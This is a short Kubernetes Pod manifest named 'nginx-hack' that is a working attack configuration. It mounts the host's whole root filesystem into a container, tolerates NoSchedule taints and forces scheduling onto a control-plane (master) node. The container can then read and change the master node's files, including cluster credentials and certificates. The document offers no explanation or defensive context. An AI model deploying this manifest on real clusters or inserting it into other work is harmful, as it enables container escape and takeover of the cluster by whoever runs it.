apiVersion: v1
kind: Pod
metadata:
  name: nginx-hack
spec:
  containers:
    - name: nginx
      image: nginx
      volumeMounts:
        - mountPath: /master
          name: master
  volumes:
    - name: master
      hostPath:
        path: /
        type: Directory
  tolerations:
    - operator: "Exists"
      effect: "NoSchedule"
  nodeSelector:
    node-role.kubernetes.io/master: ""
